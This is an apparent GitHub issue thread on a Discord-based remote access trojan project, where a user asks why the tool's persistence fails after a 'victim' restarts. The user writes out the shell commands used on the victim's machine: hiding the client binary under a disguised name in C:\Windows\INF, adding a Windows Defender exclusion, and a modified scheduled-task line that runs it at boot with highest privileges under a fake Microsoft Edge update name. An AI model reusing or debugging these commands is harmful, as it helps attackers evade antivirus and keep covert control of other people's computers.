### ISSUE TITLE
startup don't work

### ISSUE THREAD

**Issue by RAZ321** [moom825/Discord-RAT-2.0#16]
When the user use the startup command with admin right, it make a task schedule but when the victim restart his computer the file don't start after doing these command : 
!shell move C:\Users\users\Desktop\Client-built.exe C:\Windows\INF
!shell ren C:\Windows\INF\Client-built.exe WindowsINF.exe
!cd C:\Windows\INF
!shell powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\INF"
!shell C:\Windows\INF\WindowsINF.exe
then i click on the new session and
!startup

**Comment by RAZ321** [comment]
so i tried to edit the line 716 of program.cs in the discord rat to : 
`string x = String.Format("/create /tn \"{1}\" /tr \"'{0}'\" /sc onstart /rl HIGHEST", System.Reflection.Assembly.GetEntryAssembly().Location, "MicrosoftEdgeUpdateTaskMachineUATC");`

**Comment by RAZ321** [comment]
and after the restart, the file don't start. Can you help me find this issue pls

**Comment by moom825** [comment]
are you able to dm me please `moom825#9999`
